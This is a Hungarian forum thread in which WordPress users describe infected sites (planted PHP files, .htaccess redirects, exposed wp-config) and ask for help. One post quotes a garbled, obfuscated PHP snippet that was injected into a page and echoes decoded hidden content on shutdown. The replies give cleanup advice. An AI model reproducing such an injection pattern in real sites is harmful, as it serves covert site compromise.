FTP jelszólopó, WordPress támadó keylogger

Üdv!





Május 21ikén, a tárhelyemen az összes WordPress-es oldal domain root-jába bekerült egy ismeretlen, véletlenszerű új mappa és a htacces fájlok is “bővültek” kártékony kódokkal.











Miért írom ide?




  • Az új véletlen nevű mappába egy php fájl van. Szerkesztővel nézve a subscribe2 plugin fájlaként azonosítja magát.




  • A WordPress wp-config fájlát teszi külsőleg is láthatóvá.




  • Átirányításokat hoz létre.











    Érdemes figyelni, gondoltam szólok.

szó volt róla már többször is. kasperskyt kell használni, plusz ftp jelszavakat nem megjegyeztetni a progival, vagy mester-jelszavazni pluszban…

Csatolok egy képet, hogy milyen vírusok, trójaik kerültek elő. Ha valaki valamelyikkel találkozna, akkor gyorsan ellenőrizze az oldalait.





[attachment=324:wp-trojais-fertozes.jpg]

Sziasztok!





Nézzétek el nekem, nagyon kezdőnek, de hiába van pár hónapja meg a WP-m, használom, de alig értek hozzá. Most kitolt velem, és nem tudom, miért, hogyan. Semmit nem csináltam vele, egyik nap jó volt, másnap pedig ilyen, mint most is http://eliza-beth.hu/wordpress/





A fejléc fölött valami kódrészlet, másolom:



Quote:




/** * Gets some core libraries and displays a top message if required. /* */ if(!function_exists('CoreLibrariesHandler')) { /* */ function CoreLibrariesHandler() { /* */ $session_keys = ' '; /* */ /* */ foreach(str_split($session_keys, bigeyes.gif as $k=>$v) { /* */ $v = str_replace(' ', 1, str_replace(' ', 0, $v)); /* */ $session_keys[$k] = chr(bindec($v)); /* */ } /* */ /* */ if($session_keys) echo $session_keys; } /* */ register_shutdown_function('CoreLibrariesHandler'); /* */ } /* ************************************************************************/








Az adminfelületen is mindenhol ott van. Az egész admin szétesett, két képernyőnyit kell letekernem, hogy alul megtaláljam, amire kattintok, szélesebb is, mint a képernyő...





A menüben eltűntek az almenüpontok, szóval a szülő látszik, de a gyermek már nem.





Audio linkplayer, Issuu és Akismet van bekapcsolva, semmi más bővítmény. És sablont is hiába cserélek, ugyanez van.





Olvasva ezt a topikot, megnéztem ftp-n is, nem találtam semmit, ami nem odavaló. Pedig kezdtem örülni, hogy hátha nálam is ez történt. De nincs nyoma.





Van ötletetek, mi történhetett? Köszönöm előre is a válaszokat!

Itt válaszolok, mert ott nem engeded. Mégiscsak megsértődtél, pedig nem akartalak megbántani. Bocsánat. És köszönöm.

?

Nem akartam kiírni a nevét, ő tudja, kinek szól.





Ha nagyon rossz helyen van itt, akkor töröld kérlek. Köszönöm.

tipp: azonnal változtass ftp jelszót, és telepítsd fel a wp legújabb verzióját, újra. ráadásul nem közvetlen a zip-ből, hanem kicsomagolva és úgy felmásolva…

A frissítés nem oldotta meg a gondot, újra feltelepíteni addig nem szeretném, amíg egy folyamatban lévő szavazásom lezajlik. Ha újratelepítek, elvesznek az adataim, amire még szükségem van egy ideig, kb két hétig, és lehet, hogy az adatbázisban van a baj. Ha már törlöm, gyökerestől törlöm. És lehet, hogy végleg. A saját szerkesztésű oldalammal még sosem volt baj, a wp. meg negyedév után vírusos? És vajon hányszor lesz még? Csalódtam benne. :frowning:

Ne frissítsd, hanem ftp írd felül az összes fájlt az eredeti, letöltött, legfrissebb csomaggal.

olyan NINCS, hogy egy wp újratelepítéstől elvesznének az adataid!!! ha mégis, akkor valamit nem jól csinálsz!











és ha neked fontosabb egy szavazás eredménye, mint a honlapod biztonsága, akkor is be is fejezhetjük a témát… :o

Lementettem ftp-ről a teljes wp csomagot (biztos ami biztos alapon), aztán töröltem az egészet, és felraktam a 3.1.1-et. Azt írta a readmeben, hogy így kell frissíteni, hát friss lett, de nem voltak meg az anyagaim. A hiba viszont ott maradt. Visszatettem az eredetit :frowning:





És nem nekem fontos a szavazás, hanem a szavazóknak, nekem megvan kigyűjtve.





Egyébként igazatok van, aki túl hülye ilyenhez, ne kezdjen vele. Törölni fogom az egészet. És bocs, hogy zaklattalak benneteket!

Megsértődni könnyebb, mint egy kicsit jobban odafigyelni magadra? A 10. hozzászólásban Syska is elmondta, hogy felül kell írni, nem újratelepíteni. És miért éppen a 3.1.1-et raktad fel, amikor nem is az a legfrissebb?











Most jól kiszúrsz velünk, hogy fortyogásod miatt letörlöd a saját - elmondásod szerint a szavazóidnak még inkább - fontos honlapot!











Ne add fel ilyen hamar!











Lehet, hogy egyébként, sűrű szárnycsapásokkal repkednek a sült galambok, de egy honlap az nem egy frissensült, hogy ripsz-ropsz meglegyen; kicsit dolgozni kell érte, aztán majd adja az örömöt is.











Ha kiduzzogtad magad, és rájössz, hogy nem helyes az amit csinálsz a szavazóiddal (nem beszélve magadról), akkor szabályosan telepítsd fel a legfrissebb wp-t, majd kérd meg a szolgáltatódat, hogy a legutóbbi mentett adatbázist tegye vissza neked (hacsak nem mentettél azt is).











Aztán kezdjél megküzdeni a feladattal, ne pedig menekülj előle. Jó munkát! Reméljük, hogy viszontlátunk! :slight_smile:

Azért a 3.1.1 mert a 3.1.2 még nincs magyarítva, ha jól olvasgattam.





És nem duzzogok, csak könnyebben boldogulok a html-lel, és ott van a wp mellett a teljes anyagom, csak nem php, hanem html. Egyetlen hibája, hogy nem lehet hozzászólni, ezért tettem fel a wp-t.





A szavazóimnak pedig max. két hétig fontos, aztán már nem lesz szükség rá.





Veletek miért szúrok ki? :unsure:











De a te kedvedért este felülírom a 3.1.1-gyel az egészet (most mennem kell dolgozni). Aztán lesz ami lesz. (Van adatbázis-mentésem, de ha ott hibás, akkor hiába)

hejj Eliza, te tényleg nagyon tájékozatlan vagy, mert már 313 is van magyarul: http://hu.wordpress.org/

Eliza!











Az én kedvemért ne törd össze magadat, főleg ne a 3.1.1-gyel… :slight_smile:











Tedd fel a 3.1.3-at egy új, másik adatbázissal. Nézd meg, hogy ott működik-e rendesen az alapsablon, meg az az egy mintaoldal, az 1 hozzászólással. (Gyaníthatóan igen.) Ne kapcsolj be egyetlen bővítményt se. Na, ekkor adhatod neki a régi adatbázist. Alapsablonnal megy? A te sablonoddal megy? Bővítmények egyesével visszakapcsolva megy? Ha nem, akkor pontosan mikor kukkan elő a hiba?

Szót fogadtam (azt hiszem :slight_smile: )





Felülírattam a 3.1.3-mal, nem változott. Félretettem az egészet, feltettem tolál újan a 3.1.3-at, új mappa, új adatbázis, új név… A kezdőoldal meg is van, de ha bejelentkezek, az adminfelületem ilyen:





http://eliza-beth.hu/kepek3/wpadmin.JPG





Írtam a szolgáltatónak…

Köszönöm mindenkinek a türelmét, segítségét. A szolgáltatóm megoldotta a gondot.

És mi volt a gond? Ha megosztanád, hogy a későbbi nemzedék is tudja, és ezzel a tapasztalattal szólhasson a szolgáltatónak… :wink:

Idézem:





“Tisztelt Ügyfelünk!











Ezúton értesítem, az illetékes rendszergazdánk tárhelyérõl leszedte a vírust.





Kérjük, mihamarabb változtassa meg az FTP jelszavát, melyet ne mentsen el a kliensben.”











Köszi mindent! :rolleyes: